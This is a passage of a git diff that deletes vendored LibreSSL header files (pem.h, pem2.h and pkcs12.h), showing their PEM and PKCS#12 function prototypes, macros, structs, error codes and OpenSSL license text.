-#define DECLARE_PEM_write_bio(name, type) /**/
-#define DECLARE_PEM_write_bio_const(name, type) /**/
-#define DECLARE_PEM_write_cb_bio(name, type) /**/
-
-#endif
-
-#define DECLARE_PEM_write(name, type) \
-	DECLARE_PEM_write_bio(name, type) \
-	DECLARE_PEM_write_fp(name, type)
-
-#define DECLARE_PEM_write_const(name, type) \
-	DECLARE_PEM_write_bio_const(name, type) \
-	DECLARE_PEM_write_fp_const(name, type)
-
-#define DECLARE_PEM_write_cb(name, type) \
-	DECLARE_PEM_write_cb_bio(name, type) \
-	DECLARE_PEM_write_cb_fp(name, type)
-
-#define DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_read_bio(name, type) \
-	DECLARE_PEM_read_fp(name, type)
-
-#define DECLARE_PEM_rw(name, type) \
-	DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_write(name, type)
-
-#define DECLARE_PEM_rw_const(name, type) \
-	DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_write_const(name, type)
-
-#define DECLARE_PEM_rw_cb(name, type) \
-	DECLARE_PEM_read(name, type) \
-	DECLARE_PEM_write_cb(name, type)
-
-typedef int pem_password_cb(char *buf, int size, int rwflag, void *userdata);
-
-int	PEM_get_EVP_CIPHER_INFO(char *header, EVP_CIPHER_INFO *cipher);
-int	PEM_do_header (EVP_CIPHER_INFO *cipher, unsigned char *data, long *len,
-	    pem_password_cb *callback, void *u);
-
-#ifndef OPENSSL_NO_BIO
-int	PEM_read_bio(BIO *bp, char **name, char **header,
-	    unsigned char **data, long *len);
-int	PEM_write_bio(BIO *bp, const char *name, char *hdr, unsigned char *data,
-	    long len);
-int	PEM_bytes_read_bio(unsigned char **pdata, long *plen, char **pnm,
-	    const char *name, BIO *bp, pem_password_cb *cb, void *u);
-void *	PEM_ASN1_read_bio(d2i_of_void *d2i, const char *name, BIO *bp,
-	    void **x, pem_password_cb *cb, void *u);
-int	PEM_ASN1_write_bio(i2d_of_void *i2d, const char *name, BIO *bp, void *x,
-	    const EVP_CIPHER *enc, unsigned char *kstr, int klen,
-	    pem_password_cb *cb, void *u);
-
-STACK_OF(X509_INFO) *	PEM_X509_INFO_read_bio(BIO *bp,
-	    STACK_OF(X509_INFO) *sk, pem_password_cb *cb, void *u);
-int	PEM_X509_INFO_write_bio(BIO *bp, X509_INFO *xi, EVP_CIPHER *enc,
-	    unsigned char *kstr, int klen, pem_password_cb *cd, void *u);
-#endif
-
-int	PEM_read(FILE *fp, char **name, char **header,
-	    unsigned char **data, long *len);
-int	PEM_write(FILE *fp, char *name, char *hdr, unsigned char *data,
-	    long len);
-void *  PEM_ASN1_read(d2i_of_void *d2i, const char *name, FILE *fp, void **x,
-	    pem_password_cb *cb, void *u);
-int	PEM_ASN1_write(i2d_of_void *i2d, const char *name, FILE *fp,
-	    void *x, const EVP_CIPHER *enc, unsigned char *kstr,
-	    int klen, pem_password_cb *callback, void *u);
-STACK_OF(X509_INFO) *	PEM_X509_INFO_read(FILE *fp, STACK_OF(X509_INFO) *sk,
-	    pem_password_cb *cb, void *u);
-
-int	PEM_SealInit(PEM_ENCODE_SEAL_CTX *ctx, EVP_CIPHER *type,
-	    EVP_MD *md_type, unsigned char **ek, int *ekl,
-	    unsigned char *iv, EVP_PKEY **pubk, int npubk);
-void	PEM_SealUpdate(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *out, int *outl,
-	    unsigned char *in, int inl);
-int	PEM_SealFinal(PEM_ENCODE_SEAL_CTX *ctx, unsigned char *sig, int *sigl,
-	    unsigned char *out, int *outl, EVP_PKEY *priv);
-
-void    PEM_SignInit(EVP_MD_CTX *ctx, EVP_MD *type);
-void    PEM_SignUpdate(EVP_MD_CTX *ctx, unsigned char *d, unsigned int cnt);
-int	PEM_SignFinal(EVP_MD_CTX *ctx, unsigned char *sigret,
-	    unsigned int *siglen, EVP_PKEY *pkey);
-
-int	PEM_def_callback(char *buf, int num, int w, void *key);
-void	PEM_proc_type(char *buf, int type);
-void	PEM_dek_info(char *buf, const char *type, int len, char *str);
-
-
-DECLARE_PEM_rw(X509, X509)
-
-DECLARE_PEM_rw(X509_AUX, X509)
-
-DECLARE_PEM_rw(X509_CERT_PAIR, X509_CERT_PAIR)
-
-DECLARE_PEM_rw(X509_REQ, X509_REQ)
-DECLARE_PEM_write(X509_REQ_NEW, X509_REQ)
-
-DECLARE_PEM_rw(X509_CRL, X509_CRL)
-
-DECLARE_PEM_rw(PKCS7, PKCS7)
-
-DECLARE_PEM_rw(NETSCAPE_CERT_SEQUENCE, NETSCAPE_CERT_SEQUENCE)
-
-DECLARE_PEM_rw(PKCS8, X509_SIG)
-
-DECLARE_PEM_rw(PKCS8_PRIV_KEY_INFO, PKCS8_PRIV_KEY_INFO)
-
-#ifndef OPENSSL_NO_RSA
-
-DECLARE_PEM_rw_cb(RSAPrivateKey, RSA)
-
-DECLARE_PEM_rw_const(RSAPublicKey, RSA)
-DECLARE_PEM_rw(RSA_PUBKEY, RSA)
-
-#endif
-
-#ifndef OPENSSL_NO_DSA
-
-DECLARE_PEM_rw_cb(DSAPrivateKey, DSA)
-
-DECLARE_PEM_rw(DSA_PUBKEY, DSA)
-
-DECLARE_PEM_rw_const(DSAparams, DSA)
-
-#endif
-
-#ifndef OPENSSL_NO_EC
-DECLARE_PEM_rw_const(ECPKParameters, EC_GROUP)
-DECLARE_PEM_rw_cb(ECPrivateKey, EC_KEY)
-DECLARE_PEM_rw(EC_PUBKEY, EC_KEY)
-#endif
-
-#ifndef OPENSSL_NO_DH
-
-DECLARE_PEM_rw_const(DHparams, DH)
-
-#endif
-
-DECLARE_PEM_rw_cb(PrivateKey, EVP_PKEY)
-
-DECLARE_PEM_rw(PUBKEY, EVP_PKEY)
-
-int PEM_write_bio_PKCS8PrivateKey_nid(BIO *bp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int PEM_write_bio_PKCS8PrivateKey(BIO *, EVP_PKEY *, const EVP_CIPHER *,
-    char *, int, pem_password_cb *, void *);
-int i2d_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int i2d_PKCS8PrivateKey_nid_bio(BIO *bp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-EVP_PKEY *d2i_PKCS8PrivateKey_bio(BIO *bp, EVP_PKEY **x, pem_password_cb *cb,
-    void *u);
-
-int i2d_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int i2d_PKCS8PrivateKey_nid_fp(FILE *fp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-int PEM_write_PKCS8PrivateKey_nid(FILE *fp, EVP_PKEY *x, int nid,
-    char *kstr, int klen,
-    pem_password_cb *cb, void *u);
-
-EVP_PKEY *d2i_PKCS8PrivateKey_fp(FILE *fp, EVP_PKEY **x, pem_password_cb *cb,
-    void *u);
-
-int PEM_write_PKCS8PrivateKey(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
-    char *kstr, int klen, pem_password_cb *cd, void *u);
-
-EVP_PKEY *PEM_read_bio_Parameters(BIO *bp, EVP_PKEY **x);
-int PEM_write_bio_Parameters(BIO *bp, EVP_PKEY *x);
-
-
-EVP_PKEY *b2i_PrivateKey(const unsigned char **in, long length);
-EVP_PKEY *b2i_PublicKey(const unsigned char **in, long length);
-EVP_PKEY *b2i_PrivateKey_bio(BIO *in);
-EVP_PKEY *b2i_PublicKey_bio(BIO *in);
-int i2b_PrivateKey_bio(BIO *out, EVP_PKEY *pk);
-int i2b_PublicKey_bio(BIO *out, EVP_PKEY *pk);
-#ifndef OPENSSL_NO_RC4
-EVP_PKEY *b2i_PVK_bio(BIO *in, pem_password_cb *cb, void *u);
-int i2b_PVK_bio(BIO *out, EVP_PKEY *pk, int enclevel, pem_password_cb *cb,
-    void *u);
-#endif
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_PEM_strings(void);
-
-/* Error codes for the PEM functions. */
-
-/* Function codes. */
-#define PEM_F_B2I_DSS					 127
-#define PEM_F_B2I_PVK_BIO				 128
-#define PEM_F_B2I_RSA					 129
-#define PEM_F_CHECK_BITLEN_DSA				 130
-#define PEM_F_CHECK_BITLEN_RSA				 131
-#define PEM_F_D2I_PKCS8PRIVATEKEY_BIO			 120
-#define PEM_F_D2I_PKCS8PRIVATEKEY_FP			 121
-#define PEM_F_DO_B2I					 132
-#define PEM_F_DO_B2I_BIO				 133
-#define PEM_F_DO_BLOB_HEADER				 134
-#define PEM_F_DO_PK8PKEY				 126
-#define PEM_F_DO_PK8PKEY_FP				 125
-#define PEM_F_DO_PVK_BODY				 135
-#define PEM_F_DO_PVK_HEADER				 136
-#define PEM_F_I2B_PVK					 137
-#define PEM_F_I2B_PVK_BIO				 138
-#define PEM_F_LOAD_IV					 101
-#define PEM_F_PEM_ASN1_READ				 102
-#define PEM_F_PEM_ASN1_READ_BIO				 103
-#define PEM_F_PEM_ASN1_WRITE				 104
-#define PEM_F_PEM_ASN1_WRITE_BIO			 105
-#define PEM_F_PEM_DEF_CALLBACK				 100
-#define PEM_F_PEM_DO_HEADER				 106
-#define PEM_F_PEM_F_PEM_WRITE_PKCS8PRIVATEKEY		 118
-#define PEM_F_PEM_GET_EVP_CIPHER_INFO			 107
-#define PEM_F_PEM_PK8PKEY				 119
-#define PEM_F_PEM_READ					 108
-#define PEM_F_PEM_READ_BIO				 109
-#define PEM_F_PEM_READ_BIO_PARAMETERS			 140
-#define PEM_F_PEM_READ_BIO_PRIVATEKEY			 123
-#define PEM_F_PEM_READ_PRIVATEKEY			 124
-#define PEM_F_PEM_SEALFINAL				 110
-#define PEM_F_PEM_SEALINIT				 111
-#define PEM_F_PEM_SIGNFINAL				 112
-#define PEM_F_PEM_WRITE					 113
-#define PEM_F_PEM_WRITE_BIO				 114
-#define PEM_F_PEM_WRITE_PRIVATEKEY			 139
-#define PEM_F_PEM_X509_INFO_READ			 115
-#define PEM_F_PEM_X509_INFO_READ_BIO			 116
-#define PEM_F_PEM_X509_INFO_WRITE_BIO			 117
-
-/* Reason codes. */
-#define PEM_R_BAD_BASE64_DECODE				 100
-#define PEM_R_BAD_DECRYPT				 101
-#define PEM_R_BAD_END_LINE				 102
-#define PEM_R_BAD_IV_CHARS				 103
-#define PEM_R_BAD_MAGIC_NUMBER				 116
-#define PEM_R_BAD_PASSWORD_READ				 104
-#define PEM_R_BAD_VERSION_NUMBER			 117
-#define PEM_R_BIO_WRITE_FAILURE				 118
-#define PEM_R_CIPHER_IS_NULL				 127
-#define PEM_R_ERROR_CONVERTING_PRIVATE_KEY		 115
-#define PEM_R_EXPECTING_PRIVATE_KEY_BLOB		 119
-#define PEM_R_EXPECTING_PUBLIC_KEY_BLOB			 120
-#define PEM_R_INCONSISTENT_HEADER			 121
-#define PEM_R_KEYBLOB_HEADER_PARSE_ERROR		 122
-#define PEM_R_KEYBLOB_TOO_SHORT				 123
-#define PEM_R_NOT_DEK_INFO				 105
-#define PEM_R_NOT_ENCRYPTED				 106
-#define PEM_R_NOT_PROC_TYPE				 107
-#define PEM_R_NO_START_LINE				 108
-#define PEM_R_PROBLEMS_GETTING_PASSWORD			 109
-#define PEM_R_PUBLIC_KEY_NO_RSA				 110
-#define PEM_R_PVK_DATA_TOO_SHORT			 124
-#define PEM_R_PVK_TOO_SHORT				 125
-#define PEM_R_READ_KEY					 111
-#define PEM_R_SHORT_HEADER				 112
-#define PEM_R_UNSUPPORTED_CIPHER			 113
-#define PEM_R_UNSUPPORTED_ENCRYPTION			 114
-#define PEM_R_UNSUPPORTED_KEY_COMPONENTS		 126
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/pem2.h b/thirdparty/libressl/include/openssl/pem2.h
deleted file mode 100644
index 19525b4..0000000
--- a/thirdparty/libressl/include/openssl/pem2.h
+++ /dev/null
@@ -1,71 +0,0 @@
-/* $OpenBSD: pem2.h,v 1.5 2014/06/12 15:49:30 deraadt Exp $ */
-/* ====================================================================
- * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-/*
- * This header only exists to break a circular dependency between pem and err
- * Ben 30 Jan 1999.
- */
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#ifndef HEADER_PEM_H
-void ERR_load_PEM_strings(void);
-#endif
-
-#ifdef __cplusplus
-}
-#endif
diff --git a/thirdparty/libressl/include/openssl/pkcs12.h b/thirdparty/libressl/include/openssl/pkcs12.h
deleted file mode 100644
index e30f9ac..0000000
--- a/thirdparty/libressl/include/openssl/pkcs12.h
+++ /dev/null
@@ -1,350 +0,0 @@
-/* $OpenBSD: pkcs12.h,v 1.17 2016/12/30 15:08:58 jsing Exp $ */
-/* Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
- * project 1999.
- */
-/* ====================================================================
- * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_PKCS12_H
-#define HEADER_PKCS12_H
-
-#include <openssl/bio.h>
-#include <openssl/x509.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#define PKCS12_KEY_ID	1
-#define PKCS12_IV_ID	2
-#define PKCS12_MAC_ID	3
-
-/* Default iteration count */
-#ifndef PKCS12_DEFAULT_ITER
-#define PKCS12_DEFAULT_ITER	PKCS5_DEFAULT_ITER
-#endif
-
-#define PKCS12_MAC_KEY_LENGTH 20
-
-#define PKCS12_SALT_LEN	8
-
-/* Uncomment out next line for unicode password and names, otherwise ASCII */
-
-/*#define PBE_UNICODE*/
-
-#ifdef PBE_UNICODE
-#define PKCS12_key_gen PKCS12_key_gen_uni
-#define PKCS12_add_friendlyname PKCS12_add_friendlyname_uni
-#else
-#define PKCS12_key_gen PKCS12_key_gen_asc
-#define PKCS12_add_friendlyname PKCS12_add_friendlyname_asc
-#endif
-
-/* MS key usage constants */
-
-#define KEY_EX	0x10
-#define KEY_SIG 0x80
-
-typedef struct {
-	X509_SIG *dinfo;
-	ASN1_OCTET_STRING *salt;
-	ASN1_INTEGER *iter;	/* defaults to 1 */
-} PKCS12_MAC_DATA;
-
-typedef struct {
-	ASN1_INTEGER *version;
-	PKCS12_MAC_DATA *mac;
-	PKCS7 *authsafes;
-} PKCS12;
-
-typedef struct {
-	ASN1_OBJECT *type;
-	union {
-	struct pkcs12_bag_st *bag; /* secret, crl and certbag */
-	struct pkcs8_priv_key_info_st	*keybag; /* keybag */
-	X509_SIG *shkeybag; /* shrouded key bag */
-		STACK_OF(PKCS12_SAFEBAG) *safes;
-		ASN1_TYPE *other;
-	} value;
-	STACK_OF(X509_ATTRIBUTE) *attrib;
-} PKCS12_SAFEBAG;
-
-DECLARE_STACK_OF(PKCS12_SAFEBAG)
-DECLARE_PKCS12_STACK_OF(PKCS12_SAFEBAG)
-
-typedef struct pkcs12_bag_st {
-	ASN1_OBJECT *type;
-	union {
-		ASN1_OCTET_STRING *x509cert;
-		ASN1_OCTET_STRING *x509crl;
-		ASN1_OCTET_STRING *octet;
-		ASN1_IA5STRING *sdsicert;
-		ASN1_TYPE *other; /* Secret or other bag */
-	} value;
-} PKCS12_BAGS;
-
-#define PKCS12_ERROR	0
-#define PKCS12_OK	1
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Compatibility macros */
-
-#define M_PKCS12_x5092certbag PKCS12_x5092certbag
-#define M_PKCS12_x509crl2certbag PKCS12_x509crl2certbag
-
-#define M_PKCS12_certbag2x509 PKCS12_certbag2x509
-#define M_PKCS12_certbag2x509crl PKCS12_certbag2x509crl
-
-#define M_PKCS12_unpack_p7data PKCS12_unpack_p7data
-#define M_PKCS12_pack_authsafes PKCS12_pack_authsafes
-#define M_PKCS12_unpack_authsafes PKCS12_unpack_authsafes
-#define M_PKCS12_unpack_p7encdata PKCS12_unpack_p7encdata
-
-#define M_PKCS12_decrypt_skey PKCS12_decrypt_skey
-#define M_PKCS8_decrypt PKCS8_decrypt
-
-#define M_PKCS12_bag_type(bg) OBJ_obj2nid((bg)->type)
-#define M_PKCS12_cert_bag_type(bg) OBJ_obj2nid((bg)->value.bag->type)
-#define M_PKCS12_crl_bag_type M_PKCS12_cert_bag_type
-
-#endif /* !LIBRESSL_INTERNAL */
-
-#define PKCS12_get_attr(bag, attr_nid) \
-			 PKCS12_get_attr_gen(bag->attrib, attr_nid)
-
-#define PKCS8_get_attr(p8, attr_nid) \
-		PKCS12_get_attr_gen(p8->attributes, attr_nid)
-
-#define PKCS12_mac_present(p12) ((p12)->mac ? 1 : 0)
-
-
-PKCS12_SAFEBAG *PKCS12_x5092certbag(X509 *x509);
-PKCS12_SAFEBAG *PKCS12_x509crl2certbag(X509_CRL *crl);
-X509 *PKCS12_certbag2x509(PKCS12_SAFEBAG *bag);
-X509_CRL *PKCS12_certbag2x509crl(PKCS12_SAFEBAG *bag);
-
-PKCS12_SAFEBAG *PKCS12_item_pack_safebag(void *obj, const ASN1_ITEM *it,
-    int nid1, int nid2);
-PKCS12_SAFEBAG *PKCS12_MAKE_KEYBAG(PKCS8_PRIV_KEY_INFO *p8);
-PKCS8_PRIV_KEY_INFO *PKCS8_decrypt(X509_SIG *p8, const char *pass, int passlen);
-PKCS8_PRIV_KEY_INFO *PKCS12_decrypt_skey(PKCS12_SAFEBAG *bag, const char *pass,
-    int passlen);
-X509_SIG *PKCS8_encrypt(int pbe_nid, const EVP_CIPHER *cipher,
-    const char *pass, int passlen, unsigned char *salt, int saltlen, int iter,
-    PKCS8_PRIV_KEY_INFO *p8);
-PKCS12_SAFEBAG *PKCS12_MAKE_SHKEYBAG(int pbe_nid, const char *pass,
-    int passlen, unsigned char *salt, int saltlen, int iter,
-    PKCS8_PRIV_KEY_INFO *p8);
-PKCS7 *PKCS12_pack_p7data(STACK_OF(PKCS12_SAFEBAG) *sk);
-STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7data(PKCS7 *p7);
-PKCS7 *PKCS12_pack_p7encdata(int pbe_nid, const char *pass, int passlen,
-    unsigned char *salt, int saltlen, int iter, STACK_OF(PKCS12_SAFEBAG) *bags);
-STACK_OF(PKCS12_SAFEBAG) *PKCS12_unpack_p7encdata(PKCS7 *p7, const char *pass,
-    int passlen);
-
-int PKCS12_pack_authsafes(PKCS12 *p12, STACK_OF(PKCS7) *safes);
-STACK_OF(PKCS7) *PKCS12_unpack_authsafes(PKCS12 *p12);
-
-int PKCS12_add_localkeyid(PKCS12_SAFEBAG *bag, unsigned char *name,
-    int namelen);
-int PKCS12_add_friendlyname_asc(PKCS12_SAFEBAG *bag, const char *name,
-    int namelen);
-int PKCS12_add_CSPName_asc(PKCS12_SAFEBAG *bag, const char *name,
-    int namelen);
-int PKCS12_add_friendlyname_uni(PKCS12_SAFEBAG *bag, const unsigned char *name,
-    int namelen);
-int PKCS8_add_keyusage(PKCS8_PRIV_KEY_INFO *p8, int usage);
-ASN1_TYPE *PKCS12_get_attr_gen(STACK_OF(X509_ATTRIBUTE) *attrs, int attr_nid);
-char *PKCS12_get_friendlyname(PKCS12_SAFEBAG *bag);
-unsigned char *PKCS12_pbe_crypt(X509_ALGOR *algor, const char *pass,
-    int passlen, unsigned char *in, int inlen, unsigned char **data,
-    int *datalen, int en_de);
-void * PKCS12_item_decrypt_d2i(X509_ALGOR *algor, const ASN1_ITEM *it,
-    const char *pass, int passlen, ASN1_OCTET_STRING *oct, int zbuf);
-ASN1_OCTET_STRING *PKCS12_item_i2d_encrypt(X509_ALGOR *algor,
-    const ASN1_ITEM *it, const char *pass, int passlen, void *obj, int zbuf);
-PKCS12 *PKCS12_init(int mode);
-int PKCS12_key_gen_asc(const char *pass, int passlen, unsigned char *salt,
-    int saltlen, int id, int iter, int n, unsigned char *out,
-    const EVP_MD *md_type);
-int PKCS12_key_gen_uni(unsigned char *pass, int passlen, unsigned char *salt,
-    int saltlen, int id, int iter, int n, unsigned char *out,
-    const EVP_MD *md_type);
-int PKCS12_PBE_keyivgen(EVP_CIPHER_CTX *ctx, const char *pass, int passlen,
-    ASN1_TYPE *param, const EVP_CIPHER *cipher, const EVP_MD *md_type,
-    int en_de);
-int PKCS12_gen_mac(PKCS12 *p12, const char *pass, int passlen,
-    unsigned char *mac, unsigned int *maclen);
-int PKCS12_verify_mac(PKCS12 *p12, const char *pass, int passlen);
-int PKCS12_set_mac(PKCS12 *p12, const char *pass, int passlen,
-    unsigned char *salt, int saltlen, int iter,
-    const EVP_MD *md_type);
-int PKCS12_setup_mac(PKCS12 *p12, int iter, unsigned char *salt,
-    int saltlen, const EVP_MD *md_type);
-unsigned char *OPENSSL_asc2uni(const char *asc, int asclen,
-    unsigned char **uni, int *unilen);
-char *OPENSSL_uni2asc(unsigned char *uni, int unilen);
-
-PKCS12 *PKCS12_new(void);
-void PKCS12_free(PKCS12 *a);
-PKCS12 *d2i_PKCS12(PKCS12 **a, const unsigned char **in, long len);
-int i2d_PKCS12(PKCS12 *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_it;
-PKCS12_MAC_DATA *PKCS12_MAC_DATA_new(void);
-void PKCS12_MAC_DATA_free(PKCS12_MAC_DATA *a);
-PKCS12_MAC_DATA *d2i_PKCS12_MAC_DATA(PKCS12_MAC_DATA **a, const unsigned char **in, long len);
-int i2d_PKCS12_MAC_DATA(PKCS12_MAC_DATA *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_MAC_DATA_it;
-PKCS12_SAFEBAG *PKCS12_SAFEBAG_new(void);
-void PKCS12_SAFEBAG_free(PKCS12_SAFEBAG *a);
-PKCS12_SAFEBAG *d2i_PKCS12_SAFEBAG(PKCS12_SAFEBAG **a, const unsigned char **in, long len);
-int i2d_PKCS12_SAFEBAG(PKCS12_SAFEBAG *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_SAFEBAG_it;
-PKCS12_BAGS *PKCS12_BAGS_new(void);
-void PKCS12_BAGS_free(PKCS12_BAGS *a);
-PKCS12_BAGS *d2i_PKCS12_BAGS(PKCS12_BAGS **a, const unsigned char **in, long len);
-int i2d_PKCS12_BAGS(PKCS12_BAGS *a, unsigned char **out);
-extern const ASN1_ITEM PKCS12_BAGS_it;
-
-extern const ASN1_ITEM PKCS12_SAFEBAGS_it;
-extern const ASN1_ITEM PKCS12_AUTHSAFES_it;
-
-void PKCS12_PBE_add(void);
-int PKCS12_parse(PKCS12 *p12, const char *pass, EVP_PKEY **pkey, X509 **cert,
-    STACK_OF(X509) **ca);
-PKCS12 *PKCS12_create(char *pass, char *name, EVP_PKEY *pkey, X509 *cert,
-    STACK_OF(X509) *ca, int nid_key, int nid_cert, int iter,
-    int mac_iter, int keytype);
-
-PKCS12_SAFEBAG *PKCS12_add_cert(STACK_OF(PKCS12_SAFEBAG) **pbags, X509 *cert);
-PKCS12_SAFEBAG *PKCS12_add_key(STACK_OF(PKCS12_SAFEBAG) **pbags, EVP_PKEY *key,
-    int key_usage, int iter, int key_nid, char *pass);
-int PKCS12_add_safe(STACK_OF(PKCS7) **psafes, STACK_OF(PKCS12_SAFEBAG) *bags,
-    int safe_nid, int iter, char *pass);
-PKCS12 *PKCS12_add_safes(STACK_OF(PKCS7) *safes, int p7_nid);
-
-int i2d_PKCS12_bio(BIO *bp, PKCS12 *p12);
-int i2d_PKCS12_fp(FILE *fp, PKCS12 *p12);
-PKCS12 *d2i_PKCS12_bio(BIO *bp, PKCS12 **p12);
-PKCS12 *d2i_PKCS12_fp(FILE *fp, PKCS12 **p12);
-int PKCS12_newpass(PKCS12 *p12, char *oldpass, char *newpass);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_PKCS12_strings(void);
-
-/* Error codes for the PKCS12 functions. */
-
-/* Function codes. */
-#define PKCS12_F_PARSE_BAG				 129
-#define PKCS12_F_PARSE_BAGS				 103
-#define PKCS12_F_PKCS12_ADD_FRIENDLYNAME		 100
-#define PKCS12_F_PKCS12_ADD_FRIENDLYNAME_ASC		 127
-#define PKCS12_F_PKCS12_ADD_FRIENDLYNAME_UNI		 102
-#define PKCS12_F_PKCS12_ADD_LOCALKEYID			 104
-#define PKCS12_F_PKCS12_CREATE				 105
-#define PKCS12_F_PKCS12_GEN_MAC				 107
-#define PKCS12_F_PKCS12_INIT				 109
-#define PKCS12_F_PKCS12_ITEM_DECRYPT_D2I		 106
-#define PKCS12_F_PKCS12_ITEM_I2D_ENCRYPT		 108
-#define PKCS12_F_PKCS12_ITEM_PACK_SAFEBAG		 117
-#define PKCS12_F_PKCS12_KEY_GEN_ASC			 110
-#define PKCS12_F_PKCS12_KEY_GEN_UNI			 111
-#define PKCS12_F_PKCS12_MAKE_KEYBAG			 112
-#define PKCS12_F_PKCS12_MAKE_SHKEYBAG			 113
